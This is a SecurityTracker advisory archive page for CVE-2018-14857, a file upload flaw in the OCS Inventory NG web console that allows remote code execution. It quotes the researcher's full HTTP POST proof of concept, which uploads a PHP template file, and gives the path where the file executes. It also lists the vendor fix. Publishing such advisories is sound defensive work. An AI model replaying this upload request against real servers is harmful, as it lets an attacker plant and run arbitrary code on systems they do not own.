SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


Try our Premium Alert Service
 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service





Category:   Application (Generic)  >   OCS inventory NG Vendors:   ocsinventory-ng.org
OCS inventory NG Lack of Template File Upload Restrictions Lets Remote Authenticated Users Upload and Execute Arbitrary Code
SecurityTracker Alert ID:  1041418
SecurityTracker URL:  http://securitytracker.com/id/1041418
CVE Reference:   CVE-2018-14857   (Links to External Site)
Date:  Aug 3 2018
Impact:   Execution of arbitrary code via network, Modification of system information, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  

Description:   A vulnerability was reported in OCS inventory NG. A remote authenticated user can upload files and execute arbitrary code on the target system.

A remote authenticated user can upload a specially crafted template file containing PHP code and then cause the code to be executed on the target system. The code will run with the privileges of the target service.

Simon Uvarov reported this vulnerability.

Impact:   A remote authenticated user can upload files to the target system.

A remote authenticated user can execute arbitrary PHP code on the target system.

Solution:   The vendor has issued a source code fix, available at:

https://github.com/OCSInventory-NG/OCSInventory-ocsreports/commit/cc572819e373f7ff81dec61591b6f465b43c5515

Vendor URL:  www.ocsinventory-ng.org/en/ (Links to External Site)
Cause:   Access control error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [FD] CVE-2018-14857 (Unrestricted File Upload (RCE) in OCS Inventory NG Webconsole before 2.5)

# Title
Unrestricted File Upload (RCE) in OCS Inventory NG Webconsole before 2.5

#Reserved CVE
CVE-2018-14857

# Vulnerability Overview
OCS Inventory NG OCS Inventory Server through 2.5 allows a privileged user to gain access to the server via a template file containing PHP code, because file extensions other than .html are permitted.

# Discovered By
Simon Uvarov

# Vendor Status
Fixed.

# Vulnerability Details
The following request saves the phpinfo.php file to the `/usr/share/ocsinventory-reports/ocsreports/templates/` directory.

```
POST /ocsreports/index.php?function=notification HTTP/1.1
Host: 192.168.5.135
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.5.135/ocsreports/index.php?function=notification
Content-Type: multipart/form-data; boundary=---------------------------2093529028912
Content-Length: 970
Cookie: VERS=7015; show_all_plugins_col=a%3A6%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%222%22%3Bi%3A2%3Bs%3A1%3A%223%22%3Bi%3A3%3Bs%3A1%3A%224%22%3Bi%3A4%3Bs%3A1%3A%225%22%3Bi%3A5%3Bs%3A1%3A%228%22%3B%7D; LANG=en_GB; IPDISCOVER_inv_col=a%3A6%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%222%22%3Bi%3A2%3Bs%3A1%3A%223%22%3Bi%3A3%3Bs%3A1%3A%224%22%3Bi%3A4%3Bs%3A1%3A%226%22%3Bi%3A5%3Bs%3A1%3A%227%22%3B%7D; DOWNLOAD_AFFECT_RULES_col=a%3A2%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%224%22%3B%7D; PHPSESSID=0ljuolnkjcbh77ie825k3c2dc7
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------2093529028912
Content-Disposition: form-data; name="CSRF_584"

c282a92b615fcae79a060321a8285c92d759197f
-----------------------------2093529028912
Content-Disposition: form-data; name="onglet"

NOTIF_PERSO
-----------------------------2093529028912
Content-Disposition: form-data; name="old_onglet"

NOTIF_PERSO
-----------------------------2093529028912
Content-Disposition: form-data; name="notif_choice"

PERSO
-----------------------------2093529028912
Content-Disposition: form-data; name="template"; filename="phpinfo.php"
Content-Type: text/html

<?php phpinfo(); ?>

-----------------------------2093529028912
Content-Disposition: form-data; name="subject"

-----------------------------2093529028912
Content-Disposition: form-data; name="RELOAD_CONF"

-----------------------------2093529028912
Content-Disposition: form-data; name="Send"

Update
-----------------------------2093529028912--

```

The PHP file is then accessible via  http://192.168.5.135/ocsreports/templates/phpinfo.php

# Timeline:
2018-08-01: vuln discovered
2018-08-01: emailed vendor
2018-08-02: reply from vendor: vuln confirmed & patch is created
2018-08-03: public disclosure

# Patch:
https://github.com/OCSInventory-NG/OCSInventory-ocsreports/commit/cc572819e373f7ff81dec61591b6f465b43c5515

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2018, SecurityGlobal.net LLC